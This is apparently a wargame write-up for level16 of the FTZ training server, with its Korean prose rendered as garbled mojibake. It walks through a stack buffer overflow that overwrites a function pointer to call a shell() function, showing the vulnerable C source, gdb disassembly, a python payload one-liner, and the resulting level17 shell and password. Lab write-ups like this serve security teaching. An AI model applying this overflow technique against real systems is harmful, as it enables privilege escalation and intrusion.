[FTZ] level16 ํ์ด
๐ก FTZ level16 ํ์ด
๋ฌธ์
๊ณ์ : level16/about to cause mass
hint
#include <stdio.h>
void shell() {
setreuid(3097,3097);
system("/bin/sh");
}
void printit() {
printf("Hello there!\n");
}
main()
{ int crap;
void (*call)()=printit;
char buf[20];
fgets(buf,48,stdin);
call();
}
ํ์ด
call ๋ณ์์ printit ํจ์์ ์ฃผ์๊ฐ ๋ค์ด์๋๋ฐ, ์ด๋ฅผ ๋ฎ์ด์จ์ shell()ํจ์๊ฐ ํธ์ถ๋๋๋ก ํ๋ฉด ์์ ํ๋ํ ์ ์์ต๋๋ค.
์ฐ์ gdb๋ฅผ ์คํํฉ๋๋ค.
[level16@ftz tmp]$ gdb -q attackme
(gdb) set disass intel
(gdb) disas main
Dump of assembler code for function main:
0x08048518 <main+0>: push ebp
0x08048519 <main+1>: mov ebp,esp
0x0804851b <main+3>: sub esp,0x38
0x0804851e <main+6>: mov DWORD PTR [ebp-16],0x8048500 //printit ํจ์๋ฅผ ์ ์ฅํ๋ ๋ถ๋ถ
0x08048525 <main+13>: sub esp,0x4
0x08048528 <main+16>: push ds:0x80496e8
0x0804852e <main+22>: push 0x30
0x08048530 <main+24>: lea eax,[ebp-56] //buf์ ์์น
0x08048533 <main+27>: push eax
0x08048534 <main+28>: call 0x8048384 <fgets>
0x08048539 <main+33>: add esp,0x10
0x0804853c <main+36>: mov eax,DWORD PTR [ebp-16]
0x0804853f <main+39>: call eax
0x08048541 <main+41>: leave
0x08048542 <main+42>: ret
End of assembler dump.
ebp-16์์น์ call ๋ณ์๊ฐ ๋ค์ด์๊ณ 0x8048500์ฃผ์๋ฅผ ๋ฃ๊ณ ์์ต๋๋ค.
๊ทธ๋ฆฌ๊ณ ebp-56์ buf ๋ณ์๊ฐ ์์นํ๊ณ ์์ต๋๋ค.
ํจ์๋ค์ ์ฃผ์๋ถํฐ ํ์ธํด ๋ด ๋๋ค.
(gdb) b main
Breakpoint 1 at 0x804851e
(gdb) run
Starting program: /home/level16/tmp/attackme
Breakpoint 1, 0x0804851e in main ()
(gdb) p printit
$1 = {<text variable, no debug info>} 0x8048500 <printit>
(gdb) p shell
$2 = {<text variable, no debug info>} 0x80484d0 <shell>
ํ์ธ ๊ฒฐ๊ณผ printit ํจ์์ ์ฃผ์๋ 0x8048500์ด ๋ง๊ณ , shell ํจ์์ ์ฃผ์๋ 0x80484d0์ ๋๋ค.
์ด์ bof ์ทจ์ฝ์ ์ผ๋ก call ๋ณ์๋ฅผ ๋ฎ์ด์จ ์ค๋๋ค.
buf ๋ณ์์ call ๋ณ์์ฌ์ด์ 40๋ฐ์ดํธ๊ฐ ์์ผ๋ฏ๋ก, 40๋ฐ์ดํธ๋ฅผ ์ฑ์ด๋ค shell ๋ณ์๋ฅผ ๋ฃ์ด์ค๋๋ค.
[level16@ftz level16]$ (python -c 'print("A"*40+"\xd0\x84\x04\x08")';cat) | ./attackme
id
uid=3097(level17) gid=3096(level16) groups=3096(level16)
my-pass
Level17 Password is "king poetic".
์์ ํ๋ํ์ต๋๋ค.
๋๊ธ๋จ๊ธฐ๊ธฐ